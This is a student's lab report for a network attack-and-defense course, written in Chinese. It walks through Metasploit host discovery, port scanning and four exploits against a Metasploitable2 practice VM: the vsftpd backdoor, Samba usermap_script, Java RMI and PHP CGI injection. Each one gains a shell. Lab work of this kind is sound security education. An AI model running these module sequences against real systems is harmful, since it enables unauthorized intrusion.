20222310 2024-2025-1 《网络与系统攻防技术》实验六实验报告
一、实验内容
学习掌握Metasploit工具的使用。
下载靶机Metasploitable2,完成以下实验内容。
1.前期渗透
(1)主机发现(可用Aux中的arp_sweep,search一下就可以use)
(2)端口扫描(可以直接用nmap,也可以用Aux中的portscan/tcp等)
(3)扫描系统版本,漏洞等
2.Vsftpd源码包后门漏洞(21端口)
3.SambaMS-RPC Shell命令注入漏洞(端口139)
4.Java RMI SERVER命令执行漏洞(1099端口)
5.PHP CGI参数执行注入漏洞(80端口)
二、实验过程
1.前期渗透
(1)主机发现
靶机ifconfig
,查看靶机的ip地址,为192.168.196.129
攻击机ping靶机,能ping通
打开msfconsole控制台,search arp_sweep
选择漏洞
use 0
set rhost 192.168.196.129
run
扫描靶机,成功找到
(2)端口扫描
打开msfconsole控制台,search portscan/tcp
选择漏洞
use 0
set rhost 192.168.196.129
set ports 1-2000
run
(因为tcp扫描速度比较慢,这里只选择扫描1-2000端口,有兴趣的可以扫描1-65535端口)开放的端口如图
(3)扫描目标HTTP服务器的HTTP版本信息
打开msfconsole控制台,use auxiliary/scanner/http/http_version
选择漏洞
set rhost 192.168.196.129
run
成功扫描出了HTTP版本信息
2.Vsftpd源码包后门漏洞(21端口)
在之前的端口扫描中,我们知道了21端口是可以被利用的
打开msfconsole控制台,use exploit/unix/ftp/vsftpd_234_backdoor
选择漏洞
set rhost 192.168.196.129
run
成功得到了靶机的shell,输入uname -a
,pwd
,id
,ifconfig
验证
3.SambaMS-RPC Shell命令注入漏洞(端口139)
在之前的端口扫描中,我们知道了139端口是可以被利用的
打开msfconsole控制台,use exploit/multi/samba/usermap_script
选择漏洞
set rhost 192.168.196.129
exploit
成功得到了靶机的shell,输入uname -a
,ifconfig
验证
4.Java RMI SERVER命令执行漏洞(1099端口)
在之前的端口扫描中,我们知道了1099端口是可以被利用的
打开msfconsole控制台,use exploit/multi/misc/java_rmi_server
选择漏洞
set rhost 192.168.196.129
run
进程建立成功,接着输入sessions -i 1
,shell
,ls
验证得到了shell
也可以输入whoami
进行验证
5.PHP CGI参数执行注入漏洞(80端口)
在之前的端口扫描中,我们知道了80端口是可以被利用的
打开msfconsole控制台,use exploit/multi/http/php_cgi_arg_injection
选择漏洞
set rhost 192.168.196.129
run
获得了靶机的shell,输入shell
,ls
查看文件
三、问题及解决方案
问题1:virtualbox上安装的kali无法与给定的靶机进行有效互动,有些漏洞利用不了
问题1解决方案:在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接方式都设置为NAT模式
四、学习感悟、思考等
经过11月14号的作业和此次实验,我已经对Metasploit工具的使用有所掌握。总的来说就是“进入控制台——选择漏洞——设置参数——运行”。
作业指令和实验指令都比较简单,问题出现较多的地方就是靶机和攻击机的配置设置问题,比如我virtualbox上的kali攻击vmware上的ubuntu时会出现一些问题,并且无论怎么调整网络连接也无法完整完成实验要求。但我在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接都改为NAT模式后所有的问题都迎刃而解。
通过此次实验,我最大的感受是计算机漏洞的存在是巨大的隐患,我们日常生活中一定不能随意打开来路不明的网址、文件,要配置好自己主机的安全策略和防护软件,使自己的设备时刻处于保护中,警惕信息泄露。